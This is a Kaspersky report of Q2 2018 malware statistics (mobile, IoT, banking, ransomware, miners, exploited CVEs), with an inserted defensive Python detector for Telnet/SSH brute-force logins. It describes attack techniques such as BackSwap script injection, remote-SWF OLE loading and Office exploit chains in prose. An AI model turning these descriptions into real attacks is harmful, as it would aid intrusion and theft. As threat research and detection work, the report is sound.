
IT threat evolution Q2 2018. Statistics
10.8.2018 Kaspersky Analysis

Q2 figures
According to KSN:

Kaspersky Lab solutions blocked 962,947,023 attacks launched from online resources located in 187 countries across the globe.
351,913,075 unique URLs were recognized as malicious by Web Anti-Virus components.
Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 215,762 users.
Ransomware attacks were registered on the computers of 158,921 unique users.
Our File Anti-Virus logged 192,053,604 unique malicious and potentially unwanted objects.
Kaspersky Lab products for mobile devices detected:
1,744,244 malicious installation packages
61,045 installation packages for mobile banking Trojans
14,119 installation packages for mobile ransomware Trojans.
Mobile threats
General statistics
In Q2 2018, Kaspersky Lab detected 1,744,244 malicious installation packages, which is 421,666 packages more than in the previous quarter.

Number of detected malicious installation packages, Q2 2017 – Q2 2018

Distribution of detected mobile apps by type

Distribution of newly detected mobile apps by type, Q1 2018

Distribution of newly detected mobile apps by type, Q2 2018

Among all the threats detected in Q2 2018, the lion’s share belonged to potentially unwanted RiskTool apps (55.3%); compared to the previous quarter, their share rose by 6 p.p. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.

Second place was taken by Trojan-Dropper threats (13%), whose share fell by 7 p.p. Most detected files of this type came from the families Trojan-Dropper.AndroidOS.Piom and Trojan-Dropper.AndroidOS.Hqwar.

The share of advertising apps continued to decrease (by 8%), accounting for 9% (against 11%) of all detected threats.

A remarkable development during the reporting period was that SMS Trojans doubled their share, from 4.5% in Q1 to 8.5% in Q2.

TOP 20 mobile malware
Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool or Adware.

Verdict %*
1 DangerousObject.Multi.Generic 70.04
2 Trojan.AndroidOS.Boogr.gsh 12.17
3 Trojan-Dropper.AndroidOS.Lezok.p 4.41
4 Trojan.AndroidOS.Agent.rx 4.11
5 Trojan.AndroidOS.Piom.toe 3.44
6 Trojan.AndroidOS.Triada.dl 3.15
7 Trojan.AndroidOS.Piom.tmi 2.71
8 Trojan.AndroidOS.Piom.sme 2.69
9 Trojan-Dropper.AndroidOS.Hqwar.i 2.54
10 Trojan-Downloader.AndroidOS.Agent.ga 2.42
11 Trojan-Dropper.AndroidOS.Agent.ii 2.25
12 Trojan-Dropper.AndroidOS.Hqwar.ba 1.80
13 Trojan.AndroidOS.Agent.pac 1.73
14 Trojan.AndroidOS.Dvmap.a 1.64
15 Trojan-Dropper.AndroidOS.Lezok.b 1.55
16 Trojan-Dropper.AndroidOS.Tiny.d 1.37
17 Trojan.AndroidOS.Agent.rt 1.29
18 Trojan.AndroidOS.Hiddapp.bn 1.26
19 Trojan.AndroidOS.Piom.rfw 1.20
20 Trojan-Dropper.AndroidOS.Lezok.t 1.19
* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked.

As before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.04%), the verdict we use for malware detected using cloud technologies. In second place was Trojan.AndroidOS.Boogr.gsh (12.17%); this verdict is given to files recognized as malicious by our machine-learning system. Third was Trojan-Dropper.AndroidOS.Lezok.p (4.41%), followed at a close 0.3 p.p. margin by Trojan.AndroidOS.Agent.rx (4.11%), which held third position in Q1.

Geography of mobile threats

Map of attempted infections using mobile malware, Q2 2018

TOP 10 countries by share of users attacked by mobile malware:

Country* %**
1 Bangladesh 31.17
2 China 31.07
3 Iran 30.87
4 Nepal 30.74
5 Nigeria 25.66
6 India 25.04
7 Indonesia 24.05
8 Ivory Coast 23.67
9 Pakistan 23.49
10 Tanzania 22.38
* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

In Q2 2018, Bangladesh (31.17%) topped the list by share of mobile users attacked. China (31.07%) came second with a narrow margin. Third and fourth places were claimed respectively by Iran (30.87%) and Nepal (30.74%).

Russia (8.34%) was down in 38th place this quarter, behind Taiwan (8.48%) and Singapore (8.46%).

Mobile banking Trojans
In the reporting period, we detected 61,045 installation packages for mobile banking Trojans, which is 3.2 times more than in Q1 2018. The largest contribution was made by Trojan-Banker.AndroidOS.Hqwar.jck – this verdict was given to nearly half of detected new banking Trojans. Second came Trojan-Banker.AndroidOS.Agent.dq, accounting for about 5,000 installation packages.

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 – Q2 2018

TOP 10 mobile bankers

Verdict %*
1 Trojan-Banker.AndroidOS.Agent.dq 17.74
2 Trojan-Banker.AndroidOS.Svpeng.aj 13.22
3 Trojan-Banker.AndroidOS.Svpeng.q 8.56
4 Trojan-Banker.AndroidOS.Asacub.e 5.70
5 Trojan-Banker.AndroidOS.Agent.di 5.06
6 Trojan-Banker.AndroidOS.Asacub.bo 4.65
7 Trojan-Banker.AndroidOS.Faketoken.z 3.66
8 Trojan-Banker.AndroidOS.Asacub.bj 3.03
9 Trojan-Banker.AndroidOS.Hqwar.t 2.83
10 Trojan-Banker.AndroidOS.Asacub.ar 2.77
* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked by banking threats.

The most popular mobile banking Trojan in Q2 was Trojan-Banker.AndroidOS.Agent.dq (17.74%), closely followed by Trojan-Banker.AndroidOS.Svpeng.aj (13.22%). These two Trojans use phishing windows to steal information about users’ bank cards and online banking credentials. They also steal money through abuse of SMS services, including mobile banking. The popular banking malware Trojan-Banker.AndroidOS.Svpeng.q (8.56%) took third place in the rating, moving one notch down from its second place in Q2.

Geography of mobile banking threats, Q2 2018

TOP 10 countries by share of users attacked by mobile banking Trojans

Country* %**
1 USA 0.79
2 Russia 0.70
3 Poland 0.28
4 China 0.28
5 Tajikistan 0.27
6 Uzbekistan 0.23
7 Ukraine 0.18
8 Singapore 0.16
9 Moldova 0.14
10 Kazakhstan 0.13
* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in this country.

Overall, the rating did not see much change from Q1: Russia (0.70%) and the USA (0.79%) swapped places, both remaining in the TOP 3.

Poland (0.28%) rose from ninth to third place thanks to the active propagation of two Trojans: Trojan-Banker.AndroidOS.Agent.cw and Trojan-Banker.AndroidOS.Marcher.w. The latter was first detected in November 2017 and uses a toolset typical of banking malware: SMS interception, phishing windows and Device Administrator privileges to ensure its persistence in the system.

Mobile ransomware Trojans
In Q2 2018, we detected 14,119 installation packages for mobile ransomware Trojans, half again as many as in Q1.

Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q2 2017 – Q2 2018

Verdict %*
1 Trojan-Ransom.AndroidOS.Zebt.a 26.71
2 Trojan-Ransom.AndroidOS.Svpeng.ag 19.15
3 Trojan-Ransom.AndroidOS.Fusob.h 15.48
4 Trojan-Ransom.AndroidOS.Svpeng.ae 5.99
5 Trojan-Ransom.AndroidOS.Egat.d 4.83
6 Trojan-Ransom.AndroidOS.Svpeng.snt 4.73
7 Trojan-Ransom.AndroidOS.Svpeng.ab 4.29
8 Trojan-Ransom.AndroidOS.Small.cm 3.32
9 Trojan-Ransom.AndroidOS.Small.as 2.61
10 Trojan-Ransom.AndroidOS.Small.cj 1.80
* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab’s mobile antivirus attacked by ransomware Trojans.

The most popular mobile ransomware in Q2 was Trojan-Ransom.AndroidOS.Zebt.a (26.71%), encountered by more than a quarter of all users attacked by this type of malware. Second came Trojan-Ransom.AndroidOS.Svpeng.ag (19.15%), nudging ahead of the once-popular Trojan-Ransom.AndroidOS.Fusob.h (15.48%).

Geography of mobile ransomware Trojans, Q2 2018

TOP 10 countries by share of users attacked by mobile ransomware Trojans

Country* %**
1 USA 0.49
2 Italy 0.28
3 Kazakhstan 0.26
4 Belgium 0.22
5 Poland 0.20
6 Romania 0.18
7 China 0.17
8 Ireland 0.15
9 Mexico 0.11
10 Austria 0.09
* Excluded from the rating are countries where the number of users of Kaspersky Lab’s mobile antivirus is relatively small (fewer than 10,000).
** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

First place in the TOP 10 went to the United States (0.49%); the most active family in this country was Trojan-Ransom.AndroidOS.Svpeng:

Verdict %*
1 Trojan-Ransom.AndroidOS.Svpeng.ag 53.53%
2 Trojan-Ransom.AndroidOS.Svpeng.ae 16.37%
3 Trojan-Ransom.AndroidOS.Svpeng.snt 11.49%
4 Trojan-Ransom.AndroidOS.Svpeng.ab 10.84%
5 Trojan-Ransom.AndroidOS.Fusob.h 5.62%
6 Trojan-Ransom.AndroidOS.Svpeng.z 4.57%
7 Trojan-Ransom.AndroidOS.Svpeng.san 4.29%
8 Trojan-Ransom.AndroidOS.Svpeng.ac 2.45%
9 Trojan-Ransom.AndroidOS.Svpeng.h 0.43%
10 Trojan-Ransom.AndroidOS.Zebt.a 0.37%
* Unique users in USA attacked by this malware as a percentage of all users of Kaspersky Lab’s mobile antivirus in this country who were attacked by ransomware Trojans.

Italy (0.28%) came second among countries whose residents were attacked by mobile ransomware. In this country, most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a. Third place was claimed by Kazakhstan (0.63%), where Trojan-Ransom.AndroidOS.Small.cm was the most popular mobile ransomware.

Attacks on IoT devices
Judging by the data from our honeypots, brute forcing Telnet passwords is the most popular method of IoT malware self-propagation. Recently, however, there has been an increase in the number of attacks against other services, such as control ports. These ports are assigned to services for remote control of routers, a feature that is in demand with internet service providers, for example. We have observed attempts to attack IoT devices via port 8291, which is used by the MikroTik RouterOS control service, and via port 7547 (TR-069), which was used, among other purposes, for managing devices in the Deutsche Telekom network.

In both cases the nature of attacks was much more sophisticated than plain brute force; in particular, they involved exploits. We are inclined to think that the number of such attacks will only grow in the future on the back of the following two factors:

Brute forcing a Telnet password is a low-efficiency strategy, as there is strong competition between threat actors. Brute force attempts arrive every few seconds; once one succeeds, the threat actor blocks Telnet access for all other attackers.
After each restart of the device, the attackers have to re-infect it, thus losing part of the botnet and having to reclaim it in a competitive environment.
On the other hand, the first attacker to exploit a vulnerability gains access to a large number of devices, having spent minimal time.

Distribution of attacked services’ popularity by number of unique attacking devices, Q2 2018

Telnet attacks
The scheme of attack is as follows: the attackers find a victim device, check whether the Telnet port is open on it, and launch the password brute forcing routine. As many manufacturers of IoT devices neglect security (for instance, they hard-code service passwords on devices and give the user no way to change them), such attacks succeed and may affect entire lines of devices. The infected devices start scanning new network segments and infect new, similar devices or workstations in them.

Geography of IoT devices infected in Telnet attacks, Q2 2018

TOP 10 countries by shares of IoT devices infected via Telnet
Country %*
1 Brazil 23.38
2 China 17.22
3 Japan 8.64
4 Russia 7.22
5 USA 4.55
6 Mexico 3.78
7 Greece 3.51
8 South Korea 3.32
9 Turkey 2.61
10 India 1.71
* Infected devices in each specific country as a percentage of all IoT devices that attack via Telnet.

In Q2, Brazil (23.38%) took the lead in the number of infected devices and, consequently, in the number of Telnet attacks. Next came China (17.22%) by a small margin, and third came Japan (8.64%).

In these attacks, the threat actors most often downloaded Backdoor.Linux.Mirai.c (15.97%) to the infected devices.

TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks
Verdict %*
1 Backdoor.Linux.Mirai.c 15.97
2 Trojan-Downloader.Linux.Hajime.a 5.89
3 Trojan-Downloader.Linux.NyaDrop.b 3.34
4 Backdoor.Linux.Mirai.b 2.72
5 Backdoor.Linux.Mirai.ba 1.94
6 Trojan-Downloader.Shell.Agent.p 0.38
7 Trojan-Downloader.Shell.Agent.as 0.27
8 Backdoor.Linux.Mirai.n 0.27
9 Backdoor.Linux.Gafgyt.ba 0.24
10 Backdoor.Linux.Gafgyt.af 0.20
* Proportion of downloads of each specific malware program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks.

SSH attacks
Such attacks are launched similarly to Telnet attacks, the only difference being that they require the bots to have an SSH client installed in order to brute force credentials. The SSH protocol is cryptographically protected, so brute forcing passwords requires large computational resources. Therefore, self-propagation from IoT devices is inefficient, and full-fledged servers are used to launch the attacks. The success of an SSH attack hinges on the device owner’s or manufacturer’s faults; in other words, these are again weak passwords or preset passwords assigned by the manufacturer to an entire line of devices.
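The Telnet and SSH sections above describe the same observable pattern on the victim side: a burst of failed logins from one source every few seconds, followed (on a device with a preset password) by a success. The following detector is an added example, not Kaspersky's code or data; the log line format and the sample lines are constructed for it, and the 60-second window and 5-failure threshold are assumed starting values.

```python
"""Flag Telnet/SSH credential brute-force bursts in authentication logs.

Added example. The log format is constructed for this example:
"<ISO timestamp> <telnet|sshd> <OK|FAIL> user=<name> from=<ip>".
"""
from __future__ import annotations

import re
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample log: one Telnet brute-force burst ending in a successful
# login, one slow SSH guesser, one unparseable line, one legitimate SSH login.
SAMPLE_LOG = """\
2018-06-01T10:00:00 telnet FAIL user=root from=198.51.100.7
2018-06-01T10:00:03 telnet FAIL user=admin from=198.51.100.7
2018-06-01T10:00:05 telnet FAIL user=root from=198.51.100.7
2018-06-01T10:00:08 telnet FAIL user=admin from=198.51.100.7
2018-06-01T10:00:11 telnet FAIL user=support from=198.51.100.7
2018-06-01T10:00:14 telnet OK user=admin from=198.51.100.7
2018-06-01T10:00:20 sshd FAIL user=pi from=203.0.113.9
2018-06-01T10:07:00 sshd FAIL user=pi from=203.0.113.9
this line does not match the format and must be skipped
2018-06-01T11:00:00 sshd OK user=ops from=192.0.2.5
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) (?P<svc>telnet|sshd) "
    r"(?P<res>OK|FAIL) user=(?P<user>\S+) from=(?P<src>\S+)$"
)


@dataclass(frozen=True)
class Event:
    ts: datetime
    service: str
    success: bool
    user: str
    src: str


def parse_log(text: str) -> list[Event]:
    """Parse the assumed log format; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m is None:
            continue
        events.append(Event(datetime.fromisoformat(m["ts"]), m["svc"],
                            m["res"] == "OK", m["user"], m["src"]))
    return events


def find_bruteforce(events: list[Event], window_seconds: int = 60,
                    threshold: int = 5) -> dict[str, dict]:
    """Sliding-window brute-force detector, one window per source address.

    A source gets the verdict "bruteforce" once it has produced at least
    `threshold` failed logins inside any `window_seconds` span. If a
    successful login from the same source follows the last failure of that
    burst within the window, the verdict becomes "bruteforce_then_success":
    the pattern a device shows right before the attacker locks Telnet for
    everyone else.
    """
    window = timedelta(seconds=window_seconds)
    by_src: dict[str, list[Event]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):   # tolerate unsorted input
        by_src[ev.src].append(ev)

    findings: dict[str, dict] = {}
    for src, evs in by_src.items():
        recent: deque[Event] = deque()   # failures inside the current window
        burst_end = None                 # timestamp of the burst's last failure
        for ev in evs:
            if not ev.success:
                recent.append(ev)
                while ev.ts - recent[0].ts > window:   # evict stale failures
                    recent.popleft()
                if len(recent) >= threshold:
                    f = findings.setdefault(src, {
                        "verdict": "bruteforce", "service": ev.service,
                        "failures": 0, "first": recent[0].ts, "last": ev.ts})
                    f["last"] = ev.ts
                    burst_end = ev.ts
            elif burst_end is not None and ev.ts - burst_end <= window:
                findings[src]["verdict"] = "bruteforce_then_success"
                findings[src]["user"] = ev.user   # account that was guessed
        if src in findings:
            findings[src]["failures"] = sum(1 for e in evs if not e.success)
    return findings


if __name__ == "__main__":
    for src, f in find_bruteforce(parse_log(SAMPLE_LOG)).items():
        print(f"{src}: {f['verdict']} via {f['service']}, "
              f"{f['failures']} failures, {f['first']} .. {f['last']}")
```

With the defaults only the fast Telnet source is flagged; lowering the threshold and widening the window (for example 2 failures in 600 seconds) also catches the slow SSH guesser, at the cost of more false positives from users mistyping passwords.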

China took the lead in terms of infected devices attacking via SSH. Also, China was second in terms of infected devices attacking via Telnet.

Geography of IoT devices infected in SSH attacks, Q2 2018

TOP 10 countries by shares of IoT devices attacked via SSH
Country %*
1 China 15.77%
2 Vietnam 11.38%
3 USA 9.78%
4 France 5.45%
5 Russia 4.53%
6 Brazil 4.22%
7 Germany 4.01%
8 South Korea 3.39%
9 India 2.86%
10 Romania 2.23%
* The proportion of infected devices in each country as a percentage of all infected IoT devices attacking via SSH.

Online threats in the financial sector
Q2 events
New banking Trojan DanaBot
The Trojan DanaBot was detected in May. It has a modular structure and is capable of loading extra modules with which to intercept traffic and steal passwords and crypto wallets; in general, a standard feature set for this type of threat. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojan’s main body. DanaBot initially targeted Australian users and financial organizations; however, in early April we noticed that it had become active against financial organizations in Poland.

The peculiar BackSwap technique
The banking Trojan BackSwap turned out to be much more interesting. Most similar threats, including Zeus, Cridex and Dyreza, intercept the user’s traffic either to inject malicious scripts into the banking pages visited by the victim or to redirect it to phishing sites. By contrast, BackSwap uses an innovative technique for injecting malicious scripts: using WinAPI, it emulates keystrokes to open the developer console in the browser, and then uses this console to inject malicious scripts into web pages. In a later version of BackSwap, malicious scripts are injected via the address bar, using JavaScript protocol URLs.

Carbanak gang leader detained
On March 26, Europol announced the arrest of a leader of the cybercrime gang behind Carbanak and Cobalt Goblin. This came as a result of a joint operation between Spain’s national police, Europol and the FBI, as well as Romanian, Moldovan, Belarusian and Taiwanese authorities and private information security companies. It was expected that the leader’s arrest would reduce the group’s activity; however, recent data show that no appreciable decline has taken place. In May and June, we detected several waves of targeted phishing against banks and processing companies in Eastern Europe. The Carbanak email writers masqueraded as the support lines of reputable anti-malware vendors, the European Central Bank and other organizations. These emails carried attached weaponized documents exploiting the vulnerabilities CVE-2017-11882 and CVE-2017-8570.

Ransomware Trojan uses Doppelgänging technique
Kaspersky Lab experts detected a case of the ransomware Trojan SynAck using the Process Doppelgänging technique. Malware writers use this complex technique to make malware stealthier and to complicate its detection by security solutions. This was the first case of its use in a ransomware Trojan.

Another remarkable event was the Purga (aka Globe) cryptoware propagation campaign, during which this cryptoware, alongside other malware including a banking Trojan, was loaded onto computers infected with the Trojan Dimnie.

General statistics on financial threats
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.

In Q2 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 215,762 users.

Number of unique users attacked by financial malware, Q2 2018

Geography of attacks

Geography of banking malware attacks, Q2 2018

TOP 10 countries by percentage of attacked users
Country* % of users attacked**
1 Germany 2.7%
2 Cameroon 1.8%
3 Bulgaria 1.7%
4 Greece 1.6%
5 United Arab Emirates 1.4%
6 China 1.3%
7 Indonesia 1.3%
8 Libya 1.3%
9 Togo 1.3%
10 Lebanon 1.2%
These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data.

* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000).
** Unique Kaspersky Lab users whose computers were targeted by banking Trojans or ATM/PoS malware as a percentage of all unique users of Kaspersky Lab products in the country.

TOP 10 banking malware families
Name Verdicts* % of attacked users**
1 Nymaim Trojan.Win32.Nymaim 27.0%
2 Zbot Trojan.Win32.Zbot 26.1%
3 SpyEye Backdoor.Win32.SpyEye 15.5%
4 Emotet Backdoor.Win32.Emotet 5.3%
5 Caphaw Backdoor.Win32.Caphaw 4.7%
6 Neurevt Trojan.Win32.Neurevt 4.7%
7 NeutrinoPOS Trojan-Banker.Win32.NeutrinoPOS 3.3%
8 Gozi Trojan.Win32.Gozi 2.0%
9 Shiz Backdoor.Win32.Shiz 1.5%
10 ZAccess Backdoor.Win32.ZAccess 1.3%
* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique users attacked by this malware as a percentage of all users attacked by financial malware.

In Q2 2018, the general makeup of the TOP 10 stayed the same; however, there were some changes in the ranking. Trojan.Win32.Zbot (26.1%) and Trojan.Win32.Nymaim (27%) remain in the lead after swapping positions. The banking Trojan Emotet ramped up its activity and, accordingly, its share of attacked users rose from 2.4% to 5.3%. Conversely, Caphaw dramatically scaled back its activity, to only 4.7% from 15.2% in Q1, taking fifth position in the rating.

Cryptoware programs
Number of new modifications
In Q2, we detected 7,620 new cryptoware modifications. This is higher than in Q1, but still well below last year’s numbers.

Number of new cryptoware modifications, Q2 2017 – Q2 2018

Number of users attacked by Trojan cryptors
In Q2 2018, Kaspersky Lab products blocked cryptoware attacks on the computers of 158,921 unique users. Our statistics show that cybercriminals’ activity declined both against Q1 and on a month-on-month basis during Q2.

Number of unique users attacked by cryptors, Q2 2018

Geography of attacks

TOP 10 countries attacked by Trojan cryptors
Country* % of users attacked by cryptors**
1 Ethiopia 2.49
2 Uzbekistan 1.24
3 Vietnam 1.21
4 Pakistan 1.14
5 Indonesia 1.09
6 China 1.04
7 Venezuela 0.72
8 Azerbaijan 0.71
9 Bangladesh 0.70
10 Mongolia 0.64
* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.

The list of TOP 10 countries in Q2 is practically identical to that in Q1. However, some place trading occurred in TOP 10: Ethiopia (2.49%) pushed Uzbekistan (1.24%) down from first to second place, while Pakistan (1.14%) rose to fourth place. Vietnam (1.21%) remained in third position, and Indonesia (1.09%) remained fifth.

TOP 10 most widespread cryptor families
Name Verdicts* % of attacked users**
1 WannaCry Trojan-Ransom.Win32.Wanna 53.92
2 GandCrab Trojan-Ransom.Win32.GandCrypt 4.92
3 PolyRansom/VirLock Virus.Win32.PolyRansom 3.81
4 Shade Trojan-Ransom.Win32.Shade 2.40
5 Crysis Trojan-Ransom.Win32.Crusis 2.13
6 Cerber Trojan-Ransom.Win32.Zerber 2.09
7 (generic verdict) Trojan-Ransom.Win32.Gen 2.02
8 Locky Trojan-Ransom.Win32.Locky 1.49
9 Purgen/GlobeImposter Trojan-Ransom.Win32.Purgen 1.36
10 Cryakl Trojan-Ransom.Win32.Cryakl 1.04
* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors.

WannaCry further extended its lead over other cryptor families, its share rising to 53.92% from 38.33% in Q1. Meanwhile, the cybercriminals behind GandCrab (4.92%, emerged only in Q1 2018) put so much effort into its distribution that it rose all the way up to second place in this TOP 10, displacing the polymorphic worm PolyRansom (3.81%). The remaining positions, just as in Q1, are occupied by the long-familiar cryptors Shade, Crysis, Purgen, Cryakl, etc.

As we already reported in Ransomware and malicious cryptominers in 2016-2018, ransomware is shrinking progressively, and cryptocurrency miners are starting to take its place. Therefore, this year we decided to begin publishing quarterly reports on the situation around this type of threat. At the same time, we began to use a broader range of verdicts as a basis for collecting statistics on miners, so the Q2 statistics may not be consistent with the data from our earlier publications. They include both stealth miners, which we detect as Trojans, and those which are issued the verdict ‘Riskware not-a-virus’.

Number of new modifications
In Q2 2018, Kaspersky Lab solutions detected 13,948 new modifications of miners.

Number of new miner modifications, Q2 2018

Number of users attacked by cryptominers
In Q2, we detected attacks involving mining programs on the computers of 2,243,581 Kaspersky Lab users around the world.

Number of unique users attacked by cryptominers, Q2 2018

In April and May, the number of attacked users stayed roughly equal, and in June there was a modest decrease in cryptominers’ activity.

Geography of attacks

Geography of cryptominer attacks, Q2 2018

TOP 10 countries by percentage of attacked users
Country* % of attacked users**
1 Ethiopia 17.84
2 Afghanistan 16.21
3 Uzbekistan 14.18
4 Kazakhstan 11.40
5 Belarus 10.47
6 Indonesia 10.33
7 Mozambique 9.92
8 Vietnam 9.13
9 Mongolia 9.01
10 Ukraine 8.58
* Excluded are countries with relatively few Kaspersky Lab product users (under 50,000).
** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country.

Vulnerable apps used by cybercriminals
In Q2 2018, we again observed some major changes in the distribution of platforms most often targeted by exploits. The share of Microsoft Office exploits (67%) doubled compared to Q1 (and quadrupled compared with the average for 2017). Such sharp growth was driven primarily by mass spam messages distributing documents containing an exploit for the vulnerability CVE-2017-11882. This stack overflow vulnerability in the old, deprecated Equation Editor component existed in all versions of Microsoft Office released over the last 18 years. The exploit still works reliably in all combinations of the Microsoft Office package and Microsoft Windows, and it allows various obfuscations for bypassing protection. These two factors made this vulnerability the most popular tool in cybercriminals’ hands in Q2. The shares of other Microsoft Office vulnerabilities did not undergo much change since Q1.

Q2 KSN statistics also showed a growing number of Adobe Flash exploits delivered via Microsoft Office. Despite Adobe’s and Microsoft’s efforts to obstruct exploitation of Flash Player, a new 0-day exploit, CVE-2018-5002, was discovered in Q2. It propagated in an XLSX file and used a little-known technique that allowed the exploit to be downloaded from a remote source rather than carried in the document body. Shockwave Flash (SWF) files, like many other file formats, are embedded in Microsoft Office documents in the OLE (Object Linking and Embedding) format. In the case of an SWF file, the OLE object contains the actual file and a list of properties, one of which holds the path to the SWF file. The OLE object in the discovered exploit did not contain an SWF file; it carried only the list of properties, including a web link to the SWF file, which forced Microsoft Office to download the missing file from the provided link.

Distribution of exploits used in cybercriminals’ attacks by types of attacked applications, Q2 2018

In late March 2018, a PDF document containing exploits for two 0-day vulnerabilities was detected on VirusTotal: CVE-2018-4990 and CVE-2018-8120. The former allowed shellcode execution from JavaScript by exploiting a software error in the JPEG2000 image processor in Acrobat Reader. The latter existed in the win32k function SetImeInfoEx and was used for further privilege escalation to SYSTEM level, letting the PDF viewer escape the sandbox. An analysis of the document and our statistics show that, at the moment of upload to VirusTotal, this exploit was still at the development stage and was not used in in-the-wild attacks.

In late April, Kaspersky Lab experts using an in-house sandbox found the 0-day vulnerability CVE-2018-8174 in Internet Explorer and reported it to Microsoft. An exploit for this vulnerability used a technique associated with CVE-2017-0199 (launching an HTA script from a remote source via a specially crafted OLE object) to reach a vulnerable Internet Explorer component with the help of Microsoft Office. We are observing that exploit pack creators have already taken this vulnerability on board and are actively distributing exploits for it, both via websites and via emails containing malicious documents.

Also in Q2, we observed a growing number of network attacks. There is a growing share of attempts to exploit the vulnerabilities patched by the security update MS17-010; these make up the majority of the detected network attacks.

Attacks via web resources
The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Top 10 countries where online resources are seeded with malware
The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In the second quarter of 2018, Kaspersky Lab solutions blocked 962,947,023 attacks launched from web resources located in 187 countries around the world. 351,913,075 unique URLs were recognized as malicious by web antivirus components.

Distribution of web attack sources by country, Q2 2018

In Q2, the TOP 4 web attack source countries remained unchanged. The US (45.87%) was home to most sources of web attacks. The Netherlands (25.74%) came second by a large margin, and Germany (5.33%) was third. There was a change in fifth position: Russia (1.98%) displaced the UK, although its share decreased by 0.55 p.p.

Countries where users faced the greatest risk of online infection
To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of attacked users**
1 Belarus 33.49
2 Albania 30.27
3 Algeria 30.08
4 Armenia 29.98
5 Ukraine 29.68
6 Moldova 29.49
7 Venezuela 29.12
8 Greece 29.11
9 Kyrgyzstan 27.25
10 Kazakhstan 26.97
11 Russia 26.93
12 Uzbekistan 26.30
13 Azerbaijan 26.12
14 Serbia 25.23
15 Qatar 24.51
16 Latvia 24.40
17 Vietnam 24.03
18 Georgia 23.87
19 Philippines 23.85
20 Romania 23.55
These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.
* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

Geography of malicious web attacks in Q2 2018 (percentage of attacked users)

On average, 19.59% of Internet user computers worldwide experienced at least one Malware-class web attack.

Local threats
Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q2 2018, our File Anti-Virus detected 192,053,604 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection
For each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

The rating includes only Malware-class attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Rank  Country*        % of attacked users**
  1   Uzbekistan      51.01
  2   Afghanistan     49.57
  3   Tajikistan      46.21
  4   Yemen           45.52
  5   Ethiopia        43.64
  6   Turkmenistan    43.52
  7   Vietnam         42.56
  8   Kyrgyzstan      41.34
  9   Rwanda          40.88
 10   Mongolia        40.71
 11   Algeria         40.25
 12   Laos            40.18
 13   Syria           39.82
 14   Cameroon        38.83
 15   Mozambique      38.24
 16   Bangladesh      37.57
 17   Sudan           37.31
 18   Nepal           37.02
 19   Zambia          36.60
 20   Djibouti        36.35
These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives.
